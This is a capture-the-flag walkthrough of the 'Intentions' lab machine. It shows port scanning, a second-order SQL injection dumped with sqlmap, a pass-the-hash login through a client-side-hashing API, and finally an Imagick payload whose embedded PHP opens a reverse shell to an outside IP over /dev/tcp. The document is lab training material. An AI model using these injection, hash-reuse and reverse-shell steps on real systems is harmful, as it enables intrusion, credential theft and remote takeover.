# Intentions
## Nmap scan
```
$ nmap -sC -sV -Pn -oN nmap 10.10.11.220
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-20 21:35 +08
Nmap scan report for 10.10.11.220
Host is up (0.043s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 47:d2:00:66:27:5e:e6:9c:80:89:03:b5:8f:9e:60:e5 (ECDSA)
|_ 256 c8:d0:ac:8d:29:9b:87:40:5f:1b:b0:a4:1d:53:8f:f1 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Intentions
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.80 seconds
```
## Initial Access
### 2nd Order SQLi vulnerability
We will first save the request to get feed for the user to `getfeed`.
```
$ echo 'GET /api/v1/gallery/user/feed HTTP/1.1
Host: 10.10.11.220
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
X-XSRF-TOKEN: eyJpdiI6Im5yeW53UWtkaUVacEEveWZSSzJzdXc9PSIsInZhbHVlIjoidEVjNG8ySVpRODh6dFNUU0NEdmpSelBzMEMwNkdjbWM3TkV3aGJmVnd6ditoVXZsSHpSSnlQeThUYXM0T0w2eFMrTmgwNStDU2x0Y2hsRlR1MjVjS0NJb3hTdGs5a3VuOUFaVWlVaWozTFZRcUJDV2I2NmZxVXR4MVVNYzluYjIiLCJtYWMiOiIwZGE4MGIwZmI3YzBjNTNlN2NlODhlN2NmMDBlNDk5MTZmZDA1ODYyZWE3MjBmMjFmYTJjOGQyZmQ0MDk3MTI2IiwidGFnIjoiIn0=
Connection: close
Referer: http://10.10.11.220/gallery
Cookie: XSRF-TOKEN=eyJpdiI6Im5yeW53UWtkaUVacEEveWZSSzJzdXc9PSIsInZhbHVlIjoidEVjNG8ySVpRODh6dFNUU0NEdmpSelBzMEMwNkdjbWM3TkV3aGJmVnd6ditoVXZsSHpSSnlQeThUYXM0T0w2eFMrTmgwNStDU2x0Y2hsRlR1MjVjS0NJb3hTdGs5a3VuOUFaVWlVaWozTFZRcUJDV2I2NmZxVXR4MVVNYzluYjIiLCJtYWMiOiIwZGE4MGIwZmI3YzBjNTNlN2NlODhlN2NmMDBlNDk5MTZmZDA1ODYyZWE3MjBmMjFmYTJjOGQyZmQ0MDk3MTI2IiwidGFnIjoiIn0%3D; intentions_session=eyJpdiI6IlNMRnFzcWtoeDlabnBIc1VkUUFTZ3c9PSIsInZhbHVlIjoiaytWNElJUGZDU0ZZMGo2MnVhQ2NwWERHVUJ0MElmY3dpTjhnajhCTC96bTNmSWZROCtYcXh0ZElOWmNKc2tpS1l4NERlMzM5NGFaNTJQVDZtTFk3R3Y3WFg3enhLNm9YcmxLMGRhVmRDdVNPQzk5eU5xR1g0VFNaOFpVeFpvKzgiLCJtYWMiOiJkNWUzYjU0YTUyODlkYjlkZmRiMGM3MWNkZTNiNWUyODVkMjQzM2IwMGE1NjY5MjQxZmQ4NjIwMThhNWZkMDcwIiwidGFnIjoiIn0%3D; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwOi8vMTAuMTAuMTEuMjIwL2FwaS92MS9hdXRoL2xvZ2luIiwiaWF0IjoxNzE2MTgzNDY4LCJleHAiOjE3MTYyMDUwNjgsIm5iZiI6MTcxNjE4MzQ2OCwianRpIjoiaENEWGdueUVJTW1ERWxydiIsInN1YiI6IjI4IiwicHJ2IjoiMjNiZDVjODk0OWY2MDBhZGIzOWU3MDFjNDAwODcyZGI3YTU5NzZmNyJ9.bqQSS2_Gr_xt52LiU0KqomfVlft16nbrmyE5mwFfqhE
' > getfeed
```
Then, we will save the request to update the content of the user's feed.
```
$ echo 'POST /api/v1/gallery/user/genres HTTP/1.1
Host: 10.10.11.220
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Content-Type: application/json
X-XSRF-TOKEN: eyJpdiI6InBkMzkyYmQ3ZFFJazFPWFoxc0FIdVE9PSIsInZhbHVlIjoiaVAycUZEL29pVGlyb1JDcEwzTnA5TUFHTkpVMGZhRWxIbEZhQzlYT1Z2T0tJeGF5cjM1S1ZDZENTR1FMWUtEZS9oQWZWMXA1UlZrcFhNUURNUTJMaGxZdmRDbXhUTHVPd0xNaW0zOFF3K0lQRjR5N2VzSHFMbFViY203V2Nwb20iLCJtYWMiOiJlZjQyOWE5M2ZmOGM5OWFmYzY4OThhMWMyMzJjNDgwNDdlODg0MmQ0MTIwNTRlNTM0NmRmZmI2MjFhNDRlOGZkIiwidGFnIjoiIn0=
Content-Length: 17
Origin: http://10.10.11.220
Connection: close
Referer: http://10.10.11.220/gallery
Cookie: XSRF-TOKEN=eyJpdiI6InBkMzkyYmQ3ZFFJazFPWFoxc0FIdVE9PSIsInZhbHVlIjoiaVAycUZEL29pVGlyb1JDcEwzTnA5TUFHTkpVMGZhRWxIbEZhQzlYT1Z2T0tJeGF5cjM1S1ZDZENTR1FMWUtEZS9oQWZWMXA1UlZrcFhNUURNUTJMaGxZdmRDbXhUTHVPd0xNaW0zOFF3K0lQRjR5N2VzSHFMbFViY203V2Nwb20iLCJtYWMiOiJlZjQyOWE5M2ZmOGM5OWFmYzY4OThhMWMyMzJjNDgwNDdlODg0MmQ0MTIwNTRlNTM0NmRmZmI2MjFhNDRlOGZkIiwidGFnIjoiIn0%3D; intentions_session=eyJpdiI6ImpaY3MwMTdrbUJuUGlJc0dYZXA4MEE9PSIsInZhbHVlIjoiZDhaVEk2V2tSZEg1ZmY3cVZtOS9CL1dPK0JTMGpaZy9lbE9oNWxDZnlBZFlqd1hqVHRnUGc4OGY3eEVCbExrcFdkeDV2TUdwYmJua3RCd3JWaHArMnBQRisxaHFpMXd0a1NqUVFFUzgzN2lhR3F5eFd6cnJHYm9NN0ZxMFUyMVEiLCJtYWMiOiI2NjAxN2RkYWY5YzBlNTczOWEzYTMwZjYyMWJiZmM3ZGY3MTdhZTU4NWY5Mjc1ODMxODU1OTBmNzI0MzY4YjhiIiwidGFnIjoiIn0%3D; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwOi8vMTAuMTAuMTEuMjIwL2FwaS92MS9hdXRoL2xvZ2luIiwiaWF0IjoxNzE2MTgzNDY4LCJleHAiOjE3MTYyMDUwNjgsIm5iZiI6MTcxNjE4MzQ2OCwianRpIjoiaENEWGdueUVJTW1ERWxydiIsInN1YiI6IjI4IiwicHJ2IjoiMjNiZDVjODk0OWY2MDBhZGIzOWU3MDFjNDAwODcyZGI3YTU5NzZmNyJ9.bqQSS2_Gr_xt52LiU0KqomfVlft16nbrmyE5mwFfqhE
{"genres":"food"}' > updatefeed
```
Then we will run it using sqlmap.
However, we will encounter an error after running that command.
{% code overflow="wrap" %}
```
[21:56:23] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
```
{% endcode %}
If we look at the values each time we update, we will notice that all the whitespaces will be removed. For example, `food, travel` will become `food,travel`. So we can counter this by converting spaces to comments using `--tamper=space2comment`.
It is able to detect that the backend database is MySQL.
Next, we will dump all the data in the database.
We will see that there are 4 different tables in the database.
The first table is `migrations`.
```
Database: intentions
Table: migrations
[4 entries]
+----+-------+-------------------------------------------------------+
| id | batch | migration |
+----+-------+-------------------------------------------------------+
| 1 | 1 | 2014_10_12_000000_create_users_table |
| 2 | 1 | 2019_12_14_000001_create_personal_access_tokens_table |
| 3 | 1 | 2023_02_01_014219_create_gallery_image_table |
| 4 | 1 | 2023_02_02_014532_add_users_admin_column |
+----+-------+-------------------------------------------------------+
```
The second table is `users`.
```
Database: intentions
Table: users
[28 entries]
+----+-------------------------------+--------------------------+--------------------------------+---------+--------------------------------------------------------------+---------------------+---------------------+
| id | email | name | genres | admin | password | created_at | updated_at |
+----+-------------------------------+--------------------------+--------------------------------+---------+--------------------------------------------------------------+---------------------+---------------------+
| 1 | steve@intentions.htb | steve | food,travel,nature | 1 | $2y$10$M/g27T1kJcOpYOfPqQlI3.YfdLIwr3EWbzWOLfpoTtjpeMqpp4twa | 2023-02-02 17:43:00 | 2023-02-02 17:43:00 |
| 2 | greg@intentions.htb | greg | food,travel,nature | 1 | $2y$10$95OR7nHSkYuFUUxsT1KS6uoQ93aufmrpknz4jwRqzIbsUpRiiyU5m | 2023-02-02 17:44:11 | 2023-02-02 17:44:11 |
| 3 | hettie.rutherford@example.org | Melisa Runolfsson | food,travel,nature | 0 | $2y$10$bymjBxAEluQZEc1O7r1h3OdmlHJpTFJ6CqL1x2ZfQ3paSf509bUJ6 | 2023-02-02 18:02:37 | 2023-02-02 18:02:37 |
| 4 | nader.alva@example.org | Camren Ullrich | food,travel,nature | 0 | $2y$10$WkBf7NFjzE5GI5SP7hB5/uA9Bi/BmoNFIUfhBye4gUql/JIc/GTE2 | 2023-02-02 18:02:37 | 2023-02-02 18:02:37 |
| 5 | jones.laury@example.com | Mr. Lucius Towne I | food,travel,nature | 0 | $2y$10$JembrsnTWIgDZH3vFo1qT.Zf/hbphiPj1vGdVMXCk56icvD6mn/ae | 2023-02-02 18:02:37 | 2023-02-02 18:02:37 |
| 6 | wanda93@example.org | Jasen Mosciski | food,travel,nature | 0 | $2y$10$oKGH6f8KdEblk6hzkqa2meqyDeiy5gOSSfMeygzoFJ9d1eqgiD2rW | 2023-02-02 18:02:37 | 2023-02-02 18:02:37 |
| 7 | mwisoky@example.org | Monique D'Amore | food,travel,nature | 0 | $2y$10$pAMvp3xPODhnm38lnbwPYuZN0B/0nnHyTSMf1pbEoz6Ghjq.ecA7. | 2023-02-02 18:02:37 | 2023-02-02 18:02:37 |
| 8 | lura.zieme@example.org | Desmond Greenfelder | food,travel,nature | 0 | $2y$10$.VfxnlYhad5YPvanmSt3L.5tGaTa4/dXv1jnfBVCpaR2h.SDDioy2 | 2023-02-02 18:02:37 | 2023-02-02 18:02:37 |
| 9 | pouros.marcus@example.net | Mrs. Roxanne Raynor | food,travel,nature | 0 | $2y$10$UD1HYmPNuqsWXwhyXSW2d.CawOv1C8QZknUBRgg3/Kx82hjqbJFMO | 2023-02-02 18:02:37 | 2023-02-02 18:02:37 |
| 10 | mellie.okon@example.com | Rose Rutherford | food,travel,nature | 0 | $2y$10$4nxh9pJV0HmqEdq9sKRjKuHshmloVH1eH0mSBMzfzx/kpO/XcKw1m | 2023-02-02 18:02:37 | 2023-02-02 18:02:37 |
| 11 | trace94@example.net | Dr. Chelsie Greenholt I | food,travel,nature | 0 | $2y$10$by.sn.tdh2V1swiDijAZpe1bUpfQr6ZjNUIkug8LSdR2ZVdS9bR7W | 2023-02-02 18:02:37 | 2023-02-02 18:02:37 |
| 12 | kayleigh18@example.com | Prof. Johanna Ullrich MD | food,travel,nature | 0 | $2y$10$9Yf1zb0jwxqeSnzS9CymsevVGLWIDYI4fQRF5704bMN8Vd4vkvvHi | 2023-02-02 18:02:37 | 2023-02-02 18:02:37 |
| 13 | tdach@example.com | Prof. Gina Brekke | food,travel,nature | 0 | $2y$10$UnvH8xiHiZa.wryeO1O5IuARzkwbFogWqE7x74O1we9HYspsv9b2. | 2023-02-02 18:02:37 | 2023-02-02 18:02:37 |
| 14 | lindsey.muller@example.org | Jarrett Bayer | food,travel,nature | 0 | $2y$10$yUpaabSbUpbfNIDzvXUrn.1O8I6LbxuK63GqzrWOyEt8DRd0ljyKS | 2023-02-02 18:02:37 | 2023-02-02 18:02:37 |
| 15 | tschmidt@example.org | Macy Walter | food,travel,nature | 0 | $2y$10$01SOJhuW9WzULsWQHspsde3vVKt6VwNADSWY45Ji33lKn7sSvIxIm | 2023-02-02 18:02:37 | 2023-02-02 18:02:37 |
| 16 | murray.marilie@example.com | Prof. Devan Ortiz DDS | food,travel,nature | 0 | $2y$10$I7I4W5pfcLwu3O/wJwAeJ.xqukO924Tx6WHz1am.PtEXFiFhZUd9S | 2023-02-02 18:02:37 | 2023-02-02 18:02:37 |
| 17 | barbara.goodwin@example.com | Eula Shields | food,travel,nature | 0 | $2y$10$0fkHzVJ7paAx0rYErFAtA.2MpKY/ny1.kp/qFzU22t0aBNJHEMkg2 | 2023-02-02 18:02:37 | 2023-02-02 18:02:37 |
| 18 | maggio.lonny@example.org | Mariano Corwin | food,travel,nature | 0 | $2y$10$p.QL52DVRRHvSM121QCIFOJnAHuVPG5gJDB/N2/lf76YTn1FQGiya | 2023-02-02 18:02:37 | 2023-02-02 18:02:37 |
| 19 | chackett@example.org | Madisyn Reinger DDS | food,travel,nature | 0 | $2y$10$GDyg.hs4VqBhGlCBFb5dDO6Y0bwb87CPmgFLubYEdHLDXZVyn3lUW | 2023-02-02 18:02:37 | 2023-02-02 18:02:37 |
| 20 | layla.swift@example.net | Jayson Strosin | food,travel,nature | 0 | $2y$10$Gy9v3MDkk5cWO40.H6sJ5uwYJCAlzxf/OhpXbkklsHoLdA8aVt3Ei | 2023-02-02 18:02:37 | 2023-02-02 18:02:37 |
| 21 | rshanahan@example.net | Zelda Jenkins | food,travel,nature | 0 | $2y$10$/2wLaoWygrWELes242Cq6Ol3UUx5MmZ31Eqq91Kgm2O8S.39cv9L2 | 2023-02-02 18:02:37 | 2023-02-02 18:02:37 |
| 22 | shyatt@example.com | Eugene Okuneva I | food,travel,nature | 0 | $2y$10$k/yUU3iPYEvQRBetaF6GpuxAwapReAPUU8Kd1C0Iygu.JQ/Cllvgy | 2023-02-02 18:02:37 | 2023-02-02 18:02:37 |
| 23 | sierra.russel@example.com | Mrs. Rhianna Hahn DDS | food,travel,nature | 0 | $2y$10$0aYgz4DMuXe1gm5/aT.gTe0kgiEKO1xf/7ank4EW1s6ISt1Khs8Ma | 2023-02-02 18:02:37 | 2023-02-02 18:02:37 |
| 24 | ferry.erling@example.com | Viola Vandervort DVM | food,travel,nature | 0 | $2y$10$iGDL/XqpsqG.uu875Sp2XOaczC6A3GfO5eOz1kL1k5GMVZMipZPpa | 2023-02-02 18:02:37 | 2023-02-02 18:02:37 |
| 25 | beryl68@example.org | Prof. Margret Von Jr. | food,travel,nature | 0 | $2y$10$stXFuM4ct/eKhUfu09JCVOXCTOQLhDQ4CFjlIstypyRUGazqmNpCa | 2023-02-02 18:02:37 | 2023-02-02 18:02:37 |
| 26 | ellie.moore@example.net | Florence Crona | food,travel,nature | 0 | $2y$10$NDW.r.M5zfl8yDT6rJTcjemJb0YzrJ6gl6tN.iohUugld3EZQZkQy | 2023-02-02 18:02:37 | 2023-02-02 18:02:37 |
| 27 | littel.blair@example.org | Tod Casper | food,travel,nature | 0 | $2y$10$S5pjACbhVo9SGO4Be8hQY.Rn87sg10BTQErH3tChanxipQOe9l7Ou | 2023-02-02 18:02:37 | 2023-02-02 18:02:37 |
| 28 | test@test.com | test | food')/**/__REFLECTED_VALUE__# | 0 | $2y$10$rCnbQrTOzNmkqeN1vrJcgOe7OgtRNh6bMK0ZEPfnMF9i0rat9uOCa | 2024-05-20 05:37:41 | 2024-05-20 06:00:52 |
+----+-------------------------------+--------------------------+--------------------------------+---------+--------------------------------------------------------------+---------------------+---------------------+
```
The third table is `gallery_images`.
```
Database: intentions
Table: gallery_images
[19 entries]
+----+--------------+---------------------------------------------------------------+---------------------+---------------------+
| id | genre | file | created_at | updated_at |
+----+--------------+---------------------------------------------------------------+---------------------+---------------------+
| 1 | animals | public/animals/ashlee-w-wv36v9TGNBw-unsplash.jpg | 2023-02-02 17:41:52 | 2023-02-02 17:41:52 |
| 2 | animals | public/animals/dickens-lin-Nr7QqJIP8Do-unsplash.jpg | 2023-02-02 17:41:52 | 2023-02-02 17:41:52 |
| 3 | animals | public/animals/dickens-lin-tycqN7-MY1s-unsplash.jpg | 2023-02-02 17:41:52 | 2023-02-02 17:41:52 |
| 4 | animals | public/animals/jevgeni-fil-rz2Nh0U8vws-unsplash.jpg | 2023-02-02 17:41:52 | 2023-02-02 17:41:52 |
| 5 | animals | public/animals/kristin-o-karlsen-u8aXoDEcDR0-unsplash.jpg | 2023-02-02 17:41:52 | 2023-02-02 17:41:52 |
| 6 | architecture | public/architecture/axp-photography-EU1sTG7DGxE-unsplash.jpg | 2023-02-02 17:41:52 | 2023-02-02 17:41:52 |
| 7 | architecture | public/architecture/k-t-francis-kHm0iLOj2zg-unsplash.jpg | 2023-02-02 17:41:52 | 2023-02-02 17:41:52 |
| 8 | architecture | public/architecture/leopold-baskarad-BcIr38tPxJ8-unsplash.jpg | 2023-02-02 17:41:52 | 2023-02-02 17:41:52 |
| 9 | architecture | public/architecture/nico-baum-LudJh7dPfv4-unsplash.jpg | 2023-02-02 17:41:52 | 2023-02-02 17:41:52 |
| 10 | food | public/food/anto-meneghini-sJ4ix9_AjAc-unsplash.jpg | 2023-02-02 17:41:52 | 2023-02-02 17:41:52 |
| 11 | food | public/food/dan-9-f4enU0AY0-unsplash.jpg | 2023-02-02 17:41:52 | 2023-02-02 17:41:52 |
| 12 | food | public/food/fatemeh-rz--RqVu65QrTM-unsplash.jpg | 2023-02-02 17:41:52 | 2023-02-02 17:41:52 |
| 13 | food | public/food/jonathan-borba-BMpBW2476wQ-unsplash.jpg | 2023-02-02 17:41:52 | 2023-02-02 17:41:52 |
| 14 | food | public/food/rod-long--LMw-y4gxac-unsplash.jpg | 2023-02-02 17:41:52 | 2023-02-02 17:41:52 |
| 15 | nature | public/nature/edoardo-botez-rm8q_Gy2iJs-unsplash.jpg | 2023-02-02 17:41:52 | 2023-02-02 17:41:52 |
| 16 | nature | public/nature/laura-adai-mxGR7FogG10-unsplash.jpg | 2023-02-02 17:41:52 | 2023-02-02 17:41:52 |
| 17 | nature | public/nature/marek-piwnicki-urmnC74otpA-unsplash.jpg | 2023-02-02 17:41:52 | 2023-02-02 17:41:52 |
| 18 | nature | public/nature/marek-piwnicki-VOv4uaMf9E4-unsplash.jpg | 2023-02-02 17:41:52 | 2023-02-02 17:41:52 |
| 19 | nature | public/nature/rafael-garcin-GsQ0iSb88HY-unsplash.jpg | 2023-02-02 17:41:52 | 2023-02-02 17:41:52 |
+----+--------------+---------------------------------------------------------------+---------------------+---------------------+
```
The last table is `personal_access_token`.
```
Database: intentions
Table: personal_access_tokens
[0 entries]
+----+--------------+-------+--------+-----------+------------+------------+--------------+----------------+
| id | tokenable_id | token | name | abilities | created_at | updated_at | last_used_at | tokenable_type |
+----+--------------+-------+--------+-----------+------------+------------+--------------+----------------+
+----+--------------+-------+--------+-----------+------------+------------+--------------+----------------+
```
We only cared about the 2 admin users in the `users`table.
However, it does not seems the password is crackable. So we will see if there is another way to use this hash.
### Hidden API path
Further enumeration in the machine, we will see that there is an `admin.js` file.
```
$ feroxbuster -u http://10.10.11.220 -x js,html,php,txt
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher π€ ver: 2.10.3
ββββββββββββββββββββββββββββ¬ββββββββββββββββββββββ
π― Target Url β http://10.10.11.220
π Threads β 50
π Wordlist β /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
π Status Codes β All Status Codes!
π₯ Timeout (secs) β 7
𦑠User-Agent β feroxbuster/2.10.3
π Config File β /etc/feroxbuster/ferox-config.toml
π Extract Links β true
π² Extensions β [js, html, php, txt]
π HTTP methods β [GET]
π Recursion Depth β 4
ββββββββββββββββββββββββββββ΄ββββββββββββββββββββββ
π Press [ENTER] to use the Scan Management Menuβ’
ββββββββββββββββββββββββββββββββββββββββββββββββββ
404 GET 36l 123w 6609c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403 GET 7l 10w 162c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404 GET 1l 3w 16c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301 GET 7l 12w 178c http://10.10.11.220/css => http://10.10.11.220/css/
301 GET 7l 12w 178c http://10.10.11.220/js => http://10.10.11.220/js/
302 GET 12l 22w 322c http://10.10.11.220/logout => http://10.10.11.220
302 GET 12l 22w 322c http://10.10.11.220/admin => http://10.10.11.220
200 GET 2l 5429w 279176c http://10.10.11.220/js/login.js
200 GET 2l 2249w 153684c http://10.10.11.220/js/mdb.js
200 GET 63l 3842w 411821c http://10.10.11.220/css/app.css
200 GET 39l 94w 1523c http://10.10.11.220/
200 GET 2l 6382w 311246c http://10.10.11.220/js/admin.js
```
After searching for the keyword `password`, we came across this.
{% code overflow="wrap" %}
```
\n Hey team, I've deployed the v2 API to production and have started using it in the admin section. \n Let me know if you spot any bugs. \n This will be a major security upgrade for our users, passwords no longer need to be transmitted to the server in clear text! \n By hashing the password client side there is no risk to our users as BCrypt is basically uncrackable.\n This should take care of the concerns raised by our users regarding our lack of HTTPS connection.\n
```
{% endcode %}
So we try to see if there is any api path at v2 instead and there are.
```
$ gobuster dir -u http://10.10.11.220/api/v2/auth -w /usr/share/seclists/Discovery/Web-Content/big.txt -o sec-list-gobuster -k
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.11.220/api/v2/auth
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.bashrc (Status: 403) [Size: 162]
/.cvs (Status: 403) [Size: 162]
/.bash_history (Status: 403) [Size: 162]
/.forward (Status: 403) [Size: 162]
/.history (Status: 403) [Size: 162]
/.cvsignore (Status: 403) [Size: 162]
/.git (Status: 403) [Size: 162]
/.htpasswd (Status: 403) [Size: 162]
/.htaccess (Status: 403) [Size: 162]
/.profile (Status: 403) [Size: 162]
/.listing (Status: 403) [Size: 162]
/.perf (Status: 403) [Size: 162]
/.passwd (Status: 403) [Size: 162]
/.subversion (Status: 403) [Size: 162]
/.ssh (Status: 403) [Size: 162]
/.svn (Status: 403) [Size: 162]
/.rhosts (Status: 403) [Size: 162]
/.web (Status: 403) [Size: 162]
/login (Status: 405) [Size: 825]
/logout (Status: 405) [Size: 825]
/refresh (Status: 500) [Size: 6615]
/register (Status: 405) [Size: 825]
/user (Status: 302) [Size: 322] [--> http://10.10.11.220]
Progress: 20476 / 20477 (100.00%)
===============================================================
Finished
===============================================================
```
We can see that POST request failed as they required both the email and hash parameters.
```
$ curl -X POST http://10.10.11.220/api/v2/auth/login
{"status":"error","errors":{"email":["The email field is required."],"hash":["The hash field is required."]}}
```
After following the website on how to do a POST request using Curl, we are able to authenticated as `steve`.
{% embed url="" %}
```
$ curl -X POST -d 'email=steve@intentions.htb&hash=$2y$10$M/g27T1kJcOpYOfPqQlI3.YfdLIwr3EWbzWOLfpoTtjpeMqpp4twa' http://10.10.11.220/api/v2/auth/login
{"status":"success","name":"steve"}
```
So, we will try to authenticate using the `v2` api instead.
```
POST /api/v2/auth/login HTTP/1.1
Host: 10.10.11.220
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Content-Type: application/json
X-XSRF-TOKEN: eyJpdiI6Ik5JMUlrNnRYUmk5OTlKMkpPaG1GekE9PSIsInZhbHVlIjoiMW9PTG5Zc3RSWTFzYW5EMGlTYjhML2pHUzY5M2VwZEk3UGoyVU1HVjRKWThuSE81R1ZvV2N2bHByYUkwWFljRHFOOEhMYXloUEkyL1ZFVzUrK0UzNWowQ09FYWtNa2tsL0piUFZDK2kzQmZVaVFtYldqYTJjRHJlUlZHUithUVIiLCJtYWMiOiJmNzEzYTgzMzk4N2I5OWVlYTFiYmZlOWNkMTYzZDNkYWM1ZWEzZDljMjE1NWNmZmIxMTliNmVmYTg3ZTcyZmQ1IiwidGFnIjoiIn0=
Content-Length: 102
Origin: http://10.10.11.220
Connection: close
Referer: http://10.10.11.220/
Cookie: XSRF-TOKEN=eyJpdiI6Ik5JMUlrNnRYUmk5OTlKMkpPaG1GekE9PSIsInZhbHVlIjoiMW9PTG5Zc3RSWTFzYW5EMGlTYjhML2pHUzY5M2VwZEk3UGoyVU1HVjRKWThuSE81R1ZvV2N2bHByYUkwWFljRHFOOEhMYXloUEkyL1ZFVzUrK0UzNWowQ09FYWtNa2tsL0piUFZDK2kzQmZVaVFtYldqYTJjRHJlUlZHUithUVIiLCJtYWMiOiJmNzEzYTgzMzk4N2I5OWVlYTFiYmZlOWNkMTYzZDNkYWM1ZWEzZDljMjE1NWNmZmIxMTliNmVmYTg3ZTcyZmQ1IiwidGFnIjoiIn0%3D; intentions_session=eyJpdiI6Ikp2K3dwZENPVEJ1Q29uWlNhcEZZR3c9PSIsInZhbHVlIjoibEN5clN5V0RPdml0cktmY2ZBSnVnN2RqOUJ2cC91OXUwWGg0d1BOTjRRcm1CeVRGbUROaVpaQm5CYTJLS1JEQU9TRVl6ZTlIanpnWTk3T1U2WTlCTUNib2p2Z0VLTDdMME5ncjRvQlB0Yk5UOXl2UlcxTkJMdkN2Q0UvaXhlQmEiLCJtYWMiOiI4NDdmNDk4NzE5ZTM4MjE4OTE5Nzc3ZGI3MWJkZDg1OTBhOWQ1NTg5NmRmM2ViMTcyYTlhOTE0Y2Y4OTc5Y2NkIiwidGFnIjoiIn0%3D; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwOi8vMTAuMTAuMTEuMjIwL2FwaS92MS9hdXRoL2xvZ2luIiwiaWF0IjoxNzE2MTg2MzI0LCJleHAiOjE3MTYyMDc5MjQsIm5iZiI6MTcxNjE4NjMyNCwianRpIjoiRGxFYUNjMlZvdzg1c1hwUCIsInN1YiI6IjI4IiwicHJ2IjoiMjNiZDVjODk0OWY2MDBhZGIzOWU3MDFjNDAwODcyZGI3YTU5NzZmNyJ9.dpINYnaakWdwUl6msv6Ww9CpAQutV4ayg7WJA7ZAir8
{"email":"steve@intentions.htb","hash":"$2y$10$M/g27T1kJcOpYOfPqQlI3.YfdLIwr3EWbzWOLfpoTtjpeMqpp4twa"}
```
It turns out we are able to get into `steve`'s account.
From there, we can go to the admin page.
In the admin page, we can see all the users and images that are stored.
We can see that the image editor they used is `imagick`.
When we try to edit the image, we can see that the image's path.
When we try to edit the image's path, we will get a bad image path.
### Imagick Vulnerability
{% embed url="" %}
The above exploit uses RFI to load some PHP objects for RCE. We can try if the website is vulnerable to this attack.
```bash
$ convert xc:red -set 'Copyright' '& /dev/tcp/10.10.14.2/4444 0>&1"); ?>' payload.png
```